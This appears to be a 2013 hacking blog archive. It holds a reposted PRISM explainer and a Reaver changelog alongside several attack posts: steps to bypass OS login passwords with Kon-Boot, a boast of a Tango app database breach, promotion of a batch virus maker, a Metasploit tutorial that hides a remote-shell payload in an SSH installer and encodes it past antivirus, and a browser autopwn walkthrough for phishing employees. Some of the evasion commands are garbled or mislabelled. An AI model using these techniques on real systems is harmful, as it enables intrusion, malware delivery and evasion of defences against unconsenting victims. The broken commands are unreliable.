Saturday, July 20, 2013

Using Kon-Boot from a USB Flash Drive: Bypass those pesky Windows and Linux login passwords completely

Kon-boot is a cool tool you can download from that 
boots from a CD or floppy and modifies memory to let you login without knowing a local account password in both Windows (even up to Windows 7 32bit SP1) and Linux (not all distros). Kon-Boot is sort of a boot loader that let's you bypass having to use valid credentials when the OS finishes booting. Unfortunately, CDs are hard to put in your pocket, and many machines don't have floppies any more. What I needed was to be able to put Kon-Boot on my pico USB thumbdrive. I found some details online about how to get it on a thumbdrive using the floppy image and Unetbootin, but I had some problems with it doing an infinity loop when I tried to use Kon-Boot from a USB flash drive (worked fine on the same box from a CD). I read some of the comments on Raymond's blog, and someone pointed out the problem but did not really give the file changes to fix it (which I will give below). It seems when you boot Kon-Boot from a USB device, the USB device becomes hd0, but then Kon-Boot tries to pass on the booting process to hd0 (when the internal drive is most likely hd1 at that point) so you get the infinity loop or gray screen. I modified the syslinx.cfg to get it to work. Here are the steps to get Kon-Boot to work from a USB pen-drive:
1. Write the floppy image (NOT THE ISO YOU INBRED FELCH MONKEY!!!) to a USB flash drive using Unetbootin as seen in this image.

2. Extract the files in the following zip to the root of your thumbdrive:   
                        KonBoot Download

3. Tell your BIOS to boot from a USB drive (F12 on most Dell's brings up this boot device menu).

4. When the syslinux menu comes up, choose "1st Kon-Boot" first and step through it.

5. The 2nd time the syslinux menu comes up, choose the option "2nd try boot from drive C: as hd1".

6. If hd1 does not work, try hd2 and so forth until you get in. If you have a a multi-boot system you may get a boot error, but it still worked for me after I confirmed past it.
7. On Linux login as kon-usr at the terminal (not GDM/KDM/XDM). On Windows use any valid local user name and a blank password (or even gibberish, anything you type in as a password seems to work).
Thanks to the All guys for letting me know about Kon-Boot.

Friday, July 19, 2013

Tango App website/databases hacked


The Syrian Electronic Army hacked the Tango app (video/text messages service) website and database
The databases content a of millions of  the app users phone numbers and contacts and their emails
More than 1,5 TB of the daily-backups of the servers network has been downloaded successfully
Screenshot of the backups folder of the servers network of Tango App:

Screenshot of the Tango App log :

Screenshot shows the backup folder size :

Much of the information in the databases that were downloaded will be delivered to the Syrian government

How To Create Virus Without Any Programming Knowledge


Tool Name:- Sonic Bat Batch File Virus Maker

This program creates batch (.bat) viruses and has varied options to ruin the victim computer in different ways. We can flood the storage space on victims' computer by making large number of files in different folders by using its "folder flood" feature. It also includes bat to exe converter to convert your batch virus files into exe virus programs and an icon changer. Try it and enjoy….
if you face any trouble please comments below , your queries are valuable to us...

Thursday, July 18, 2013

Everything you need to know about PRISM

A cheat sheet for the NSA's unprecedented surveillance programs.

By T.C. Sottek and Josh Kopstein

Since September 11th, 2001, the United States government has dramatically increased the ability of its intelligence agencies to collect and investigate information on both foreign subjects and US citizens. Some of these surveillance programs, including a secret program called PRISM, capture the private data of citizens who are not suspected of any connection to terrorism or any wrongdoing.
In June, a private contractor working for Booz Allen Hamilton leaked classified presentation slides that detailed the existence and the operations of PRISM: a mechanism that allows the government to collect user data from companies like Microsoft, Google, Apple, Yahoo, and others. While much of the program — and the rest of the NSA’s surveillance efforts — are still shrouded in secrecy, more details are coming to light as the public, as well as its advocates and representatives, pressure the government to come clean about domestic spying.

The what

What the hell is PRISM? PRISM is a tool used by the US National Security Agency (NSA) to collect private electronic data belonging to users of major internet services like Gmail, Facebook, Outlook, and others. It’s the latest evolution of the US government’s post-9/11 electronic surveillance efforts, which began under President Bush with the Patriot Act, and expanded to include the Foreign Intelligence Surveillance Act (FISA) enacted in 2006 and 2007.
There’s a lot we still don’t know about how PRISM works, but the basic idea is that it allows the NSA to request data on specific people from major technology companies like Google, Yahoo, Facebook, Microsoft, Apple, and others. The US government insists that it is only allowed to collect data when given permission by the secretive Foreign Intelligence Surveillance Court.

Why is PRISM a big deal?

Classified presentation slides detailing aspects of PRISM were leaked by a former NSA contractor. On June 6th, The Guardian and The Washington Post published reports based on the leaked slides, which state that the NSA has “direct access” to the servers of Google, Facebook, and others. In the days since the leak, the implicated companies have vehemently denied knowledge of and participation in PRISM, and have rejected allegations that the US government is able to directly tap into their users' data.
Both the companies and the government insist that data is only collected with court approval and for specific targets. As The Washington Post reported, PRISM is said to merely be a streamlined system — varying between companies — that allows them to expedite court-approved data collection requests. Because there are few technical details about how PRISM operates, and because of the fact that the FISA court operates in secret, critics are concerned about the extent of the program and whether it violates the constitutional rights of US citizens.

How was PRISM created?

As The Washington Post reported, The Protect America Act of 2007 led to the creation of a secret NSA program called US-984XN — also known as PRISM. The program is said to be a streamlined version of the same surveillance practices that the US was conducting in the years following 9/11, under President George W. Bush’s “Terrorist Surveillance Program.”
The Protect America Act allows the attorney general and the director of national intelligence to explain in a classified document how the US will collect intelligence on foreigners overseas each year, but does not require specific targets or places to be named. As the Post reports, once the plan is approved by a federal judge in a secret order, the NSA can require companies like Google and Facebook to send data to the government, as long as the requests meet the classified plan's criteria.

Who is responsible for leaking PRISM?

Edward Snowden, a 29-year-old intelligence contractor formerly employed by the NSA, CIA, and Booz Allen Hamilton, confessed responsibility for leaking the PRISM documents. He revealed himself on June 9th, three days after reports on PRISM were published; in an interview with The Guardian, Snowden said, “I don’t want to live in a society that does these sort of things,” and claimed he was motivated by civic duty to leak classified information.
Snowden left the United States prior to leaking the documents in order to avoid capture, taking refuge in Hong Kong — where he stayed until June 23rd. With the assistance of WikiLeaks, Snowden fled Hong Kong for Moscow, and has requested asylum in Ecuador, Russia, and other countries. He is still residing in a Moscow airport, waiting to be granted asylum.

What does the NSA collect?

While PRISM has been the most talked-about story to come out of Snowden’s leaks, the disclosures have shed light on a vast array of NSA surveillance programs. Broadly speaking, these can be split into two categories: “upstream” wiretaps, which pull data directly from undersea telecommunications cables, and efforts like PRISM, which acquire communications from US service providers. One of the slides in the leaked PRISM presentation instructs that analysts “should use both” of these sources.
NSA programs collect two kinds of data: metadata and content. Metadata is the sensitive byproduct of communications, such as phone records that reveal the participants, times, and durations of calls; the communications collected by PRISM include the contents of emails, chats, VoIP calls, cloud-stored files, and more. US officials have tried to allay fears about the NSA’s indiscriminate metadata collection by pointing out that it doesn’t reveal the contents of conversations. But metadata can be just as revealing as content — internet metadata includes information such as email logs, geolocation data (IP addresses), and web search histories. Because of adecades-old law, metadata is also far less well-protected than content in the US.
A leaked court order provided by Snowden showed that Verizon is handing over the calling records and telephony metadata of all its customers to the NSA on an “ongoing, daily basis.” Mass collection of internet metadata began under a Bush-era program called "Stellarwind," which was first revealed by NSA whistleblower William Binney. The program was continued for two years under the Obama administration, but has since been discontinued and replaced with a host of similar programs with names like “EvilOlive” and “ShellTrumpet.”

How does the NSA collect data?

Many crucial details on how and under what circumstances the NSA collects data are still missing. Legally speaking, surveillance programs rely on two key statutes, Section 702 of the FISA Amendments Act (FAA) and Section 215 of the Patriot Act. The former authorizes the collection of communications content under PRISM and other programs, while the latter authorizes the collection of metadata from phone companies such as Verizon and AT&T. However, multiple reports and leaked documents indicate the statutes have been interpreted in secret by the FISA intelligence courts to grant much broader authority than they were originally written to allow. They also indicate that the FISA courts only approve the NSA’s collection procedures, and individual warrants for specific targets are not required.
An analyst starts by inputting “selectors” (search terms) into a system like PRISM, which then “tasks” information from other collection sites, known as SIGADs (Signals Intelligence Activity Designators). SIGADs have both classified and unclassified code names, and are tasked for different types of data — one called NUCLEON gathers the contents of phone conversations, while others like MARINA store internet metadata.
Leaked documents show that under the agency’s targeting and “minimization” rules, NSA analysts can not specifically target someone “reasonably believed” to be a US person communicating on US soil. According to The Washington Post, an analyst must have at least “51 percent” certainty their target is foreign. But even then, the NSA’s “contact chaining” practices — whereby an analyst collects records on a target’s contacts, and their contacts’ contacts — can easily cause innocent parties to be caught up in the process.
The rules state the analyst must take steps to remove data that is determined to be from “US persons,” but even if they are not relevant to terrorism or national security, these “inadvertently acquired” communications can still be retained and analyzed for up to five years — and even given to the FBI or CIA — under a broad set of circumstances. Those include communications that are "reasonably believed to contain evidence of a crime that has been, is being, or is about to be committed," or that contain information relevant to arms proliferation or cybersecurity. If communications are encrypted, they can be kept indefinitely.

So, what now?

In the weeks since the PRISM documents leaked, a widespread international public debate about the United States government’s surveillance and spying programs has engulfed the NSA, Congress, and the Obama administration in controversy. While outspoken supporters of NSA surveillance in Congress and the White House —including President Obama — have defended the legality and necessity of the programs, some US lawmakers are pushing back. In June, a bipartisan group of senators unveiled a bill that aims to rein in the problematic legal provisions that give US intelligence agencies nearly unfettered authority to conduct warrantless surveillance on domestic and foreign communications. Several other lawmakers have introduced their own measures, but legislative reform is still in early stages.


Meanwhile, a diverse coalition of interest groups and private organizations are directly challenging some of the NSA’s surveillance programs in court. On July 16th, a broad coalition of plaintiffs sued the US government for “an illegal and unconstitutional program of dragnet electronic surveillance,” in which the NSA scoops up all telephone records handled by Verizon, AT&T, and Sprint in the US. Separate suits brought by the Electronic Privacy Information Center and the American Civil Liberties Union are also in the works, but the government hasn’t responded to the allegations in court yet.
The companies at the heart of PRISM’s controversy are also acting out, but the specific details regarding their involvement in government surveillance on US citizens is still unclear. Microsoft, Google, Yahoo, and others have stepped up pressure on the government in the past month to declassify the process which compels them to hand over user data to the government. In an impassioned plea made by Microsoft on July 16th, the company’s general counsel Brad Smith said: “We believe the US constitution guarantees our freedom to share more information with the public, yet the government is stopping us.”
Finally, there’s the group of people most affected by PRISM and its sibling programs: the American public. On July 4th, “Restore the Fourth” rallies in more than 100 US cities protested the government’s surveillance programs, focusing on electronic privacy. It’s not clear if public outrage will result in reform, but thanks to the dramatic actions of a young intelligence contractor, we now at least have the opportunity to discuss what the US government has been hiding from the public in the name of national security.
Source : => Theverge

Tuesday, July 16, 2013

Reaver 1.4- Wifi Protected Setup (WPS) Brute Forcer

                        Reaver 1.4 - Wifi Protected Setup (WPS) Brute Forcer 

 An Austrian information security student and researcher Stefan Viehböck released details of a vulnerability in the WiFi Protected Setup (WPS) standard that enables attackers to recover the router PIN, a security firm has published an open-source tool capable of exploiting the vulnerability. The tool, known as Reaver, has the ability to find the WPS PIN on a given router and then recover the WPA passphrase for the router, as well. Now we have the next version Reaver 1.4
List Of Changes In Reaver 1.4:-

1Updated reaver and wash usage, reverted last wash update (unecessary).
2. Wash now processes data even if received on the wrong channel.
3.Added BSSID to session restore prompt.
4.Fixed wash pcap parsing bug.
5.Updated exchange.c to timeout properly if –no-nacks is specified.
6.Added –no-nacks option for APs that repeatedly send multiple WPS response packets.
7.Added –exec option to run a specified command upon successful completion.
8.Fixed –session bug.
9.Added RSSI output to wash.
10.Fixed makefile bug.
11.Fixed bug in pins.c introduced in r95. Pins no longer randomized.
12.Added sanity checks for out of order packets to message processing in exchange.c
13.Fixed null pointer reference bug.
14.Reverted association supported and extended rates to original values.
15.Re-work of the message processing functions, primarily in exchange.c
16.Added -p option to mkdir in makefile.
17.Added sanity checks to ensure that WPS messages are sent in the proper order.
18.Fixed arg parsing bug.
18.Updated Makefile, changed ‘walsh’ to ‘wash’. Added wash documentation.
19.Fixed bug in auto-detection of WSC_NACK support.
20.Fixed channel hopping bug. Now WSC_NACKs are always sent to ensure WPS session termination.
21.Supported rates in association packets now reflect the supported rates in the AP’s beacon packets. AP beacons are now always parsed prior to reassociation to ensure we are still on the right channel.
22.Fixed database permissions bug in Reaver Makefile
23.Fixed walsh channel bug. Added sanity checks in exchange.c before setting progress status to KEY2_DONE.
24.Fixed overflow in parse_beacon_tags.
25.Fixed logic bug where SEND_M2D status was interpreted as a RECV_DONE status.
26.Fixed memory leaks.
27.Fixed bug in generating proper WPS messages (resulted in false negatives). Added verbose message status output.
28.wpsmon char c => int c.
29.Documentation updates.
30.Fixed Makefile bug.
31.Fixed session saved output bug.
32.Updated session.c to always print restore session prompt to stderr.
33.Updated Makefile, configure script and #defines to ensure that –prefix is honored.
34.Fixed makefile not properly installing to specified prefix.
35.Removed dev debug flag
36.Enabled debug output for troubleshooting issues; don’t use unless you want lots of debug output (this will be made a command line option in the near future…)
37.Updated walsh WPS lock status display. Fixed file permission bug in Makefile. Removed old code in libwps/.
38.Updated walsh to display more useful info. Removed adaptive delay feature.
39.Added adaptive lockout sleep times, added -ldl to LDFLAGS

For Additional Information & To Download Reaver Click Here

Bypass and Crypte Payload from antivirus


Bypassing Antivirus with Msfencode (10 pts.)

What You Need

  • A BackTrack Linux machine, real or virtual. I used BackTrack 5 R2, but other versions of BackTrack are probably OK too.


We are using some harmless test files, but don’t infect people with any real viruses–that’s a crime!


Antivirus protects machines from malware, but not all of it. There are ways to pack malware to make it harder to detect. We’ll use metasploit to render malware completely invisible to antivirus.

Creating a Listener

This is a simple payload that gives the attacker remote control of a machine. It is not a virus, and won’t spread, but it is detected by antivirus engines.
In BackTrack, in a Terminal window, execute these commands:
cdmsfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe
You should see the listen.exe file, as shown below:

Analyzing the Listener with VirusTotal

In BackTrack, click ApplicationsInternet, “Firefox Web Browser“.
In Firefox, go to
Click the “Choose File” button. Navigate to /root and double-click the listen.exe
“listen.exe” appears in the “Choose File” box, as shown below:

In the VirusTotal web page, click the “Scan It!” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that many of the antivirus engines detected the file–33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.

Saving the Screen Image

Make sure the result is visible, showing something like “Detection rate: 33/42“, as shown above.
Save a screen capture with a filename of “Proj 6xa from YOUR NAME“.

Encoding the Listener

This process will encode the listener, and insert it into an innocent SSH file.
In BackTrack, in a Terminal window, execute these commands:
wget -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1
ls -l evil*
You should see the evil-ssh.exe file, as shown below:

Analyzing the Encoded Listener with VirusTotal

In Firefox, go to
Click the “Choose File” button. Navigate to /root and double-click the evil-ssh.exe file.
In the VirusTotal web page, click the “Scan It!” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now–21 out of 42, when I did it, as shown below. You may see different numbers.

Encoding the Listener Again

This process will encode the listener with several different encodings, as recommended by Keith Burton (Thanks!).

In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1
msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1
ls -l listen*
You should see several files, as shown below:

Analyzing the Encoded Listener with VirusTotal

In Firefox, go to
Click the “Choose File” button. Navigate to /root and double-click the listen5.exe file.
In the VirusTotal web page, click the “Scan It!” button.
If you see a “File already analyzed” message, click the “View last analysis” button.
The analysis shows that fewer of the antivirus engines detect the file now–0 out of 42, when I did it, as shown below. You may see different numbers.

Saving the Screen Image

Make sure the result is visible, showing a lower detection rate, like “Detection rate: 0/42“, as shown above.
Save a screen capture with a filename of “Proj 6xb from YOUR NAME“.

Monday, July 15, 2013

Metasploit Browser Autopwn

In nowadays due to firewall restrictions and patch management policies exploitation of systems has become much more difficult.However one of the most efficient way is the use of client-side attacks.Client side attacks requires the user interaction and in most of the cases can be used through social engineering engagements.An employee which will not have the necessary knowledge to understand the risks of opening untrusted links can help an attacker to exploit any internal systems.Also the fact that browsers are not patched as often as operating systems makes the problem bigger.
In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.
In order to use this attack we have to open the metasploit framework and to use the browser_autopwnmodule.In the next image you can see the available options and default settings for this module.
Options of browser autopwn module
We will set up the LHOST with our IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.

Configuring the Browser Autopwn

After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.

Loading the browser exploits

Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.

Meterpreter sessions opened with Browser Autopwn

Browser based attacks are not stable.This is because browsers can crash which means that the meterpreter session or the shell access will lost.For that reason the metasploit will try to migrate with a another process more stable as soon as possible.

Migrate to another process

Most of the organizations are behind proxy firewalls so only the port 80 is allowed.From the other hand many employees are using social networks these days for various reasons.An attacker can exploit that and send malicious links through the social networks to users so the use of this attack can be very effective against companies as it contains exploits for most of the popular browsers and it only requires the mistake of one person in order to be successful.Metasploit Browser Autopwn module is the proof of how dangerous is to open links that are coming from untrusted sources.